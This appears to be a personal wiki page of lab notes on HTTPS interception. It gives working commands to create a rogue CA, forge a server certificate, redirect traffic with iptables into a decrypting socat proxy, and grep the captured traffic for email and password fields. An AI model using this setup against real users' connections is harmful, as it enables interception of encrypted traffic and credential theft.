wiki.volution.ro -- CiprianDorinCraciun/Notes/Public/HttpsExperiments

Contents

Disclaimer
Browser
Rogue CA
Rogue Server
Rogue router

Disclaimer

The information contained on this page is for educational purposes only.
Using it for other purposes will most likely be considered as an illegal activity.

I, the author of this page, decline any direct or indirect responsibility that might arise from the usage of the information contained on this page.

You have been warned!

Browser

create a new profile:

firefox -ProfileManager -new-instance -no-remote -private

use the new profile:

firefox -P experiments -new-instance -no-remote -private

with Xnest:

/usr/bin/Xnest -geometry 800x600 :1
/usr/bin/Xephyr -screen 800x600 -dpi 120 -host-cursor :1
env DISPLAY=:1 /usr/bin/i3
env DISPLAY=:1 /usr/bin/firefox -P experiments -new-instance -no-remote -private
xlsclients -l
import -crop 800x600+0+0 -window ... /tmp/firefox-experiments-capture.png

Rogue CA

create a new CA certificate:

create the private key:

certtool --generate-privkey \
        --sec-param low \
        --outfile /tmp/evil-ca.private.pem

create the certificate (self-signed):

certtool --generate-self-signed \
        --load-privkey /tmp/evil-ca.private.pem \
        --template /dev/fd/3 \
        --outfile /tmp/evil-ca.certificate.pem \
3<<"EOS"
  cn = "Evil CA"
  expiration_days = 1
  ca
  serial = 1
EOS

install the CA certificate:

certutil -A \
        -n 'Evil CA' \
        -t 'cC' \
        -i /tmp/evil-ca.certificate.pem \
        -d /tmp/firefox-experiments-profile

Rogue Server

create a new server certificate:

create the private key:

certtool --generate-privkey \
        --sec-param low \
        --outfile /tmp/evil-server.private.pem

create the certificate request:

certtool --generate-request \
        --load-privkey /tmp/evil-server.private.pem \
        --template /dev/fd/3 \
        --outfile /tmp/evil-server.request.pem \
3<<"EOS"
  cn = "Evil Server"
  tls_www_server
  dns_name = "www.example.com"
EOS

create the certificate (sign the server request with the CA certificate):

certtool --generate-certificate \
        --load-request /tmp/evil-server.request.pem \
        --load-ca-certificate /tmp/evil-ca.certificate.pem \
        --load-ca-privkey /tmp/evil-ca.private.pem \
        --template /dev/fd/3 \
        --outfile /tmp/evil-server.certificate.pem \
3<<"EOS"
  cn = "Evil Server"
  expiration_days = 1
  tls_www_server
  dns_name = "www.example.com"
  serial = 2
EOS

Rogue router

prepare forwarding:

iptables -t nat -A OUTPUT -p tcp -d 192.0.2.2 -m tcp --dport 443 -j DNAT --to-destination 127.99.99.99:9992
iptables -t nat -A OUTPUT -p tcp -d 192.0.2.2 -m tcp --dport 80 -j DNAT --to-destination 203.0.113.1:80
iptables -t nat -A OUTPUT -p tcp -d 192.0.2.1 -j DNAT --to-destination 203.0.113.1

start the new server:

socat -v -x \
        openssl-listen:9992,bind=127.99.99.99,reuseaddr,fork,verify=0,key=/tmp/evil-server.private.pem,certificate=/tmp/evil-server.certificate.pem \
        openssl-connect:192.0.2.1:443,verify=0 \
    2>/tmp/evil-server.dump

watch the server:

tail -f /tmp/evil-server.dump \
| sed -r -u \
    -e '/^(< |> |--)/d' \
    -e '/^[0-9]{4}\/[0-9]{2}\/[0-9]{2} /d' \
    -e 's/^( [0-9a-f]{2}){,16}[ ]+ (.*)$/\2/g' \
    -e t \
    -e 'w/dev/stderr' \
    -e 'Q1' \
| tr -d '\n' \
| grep -o -E -e '&(email|pass)=[^&]+'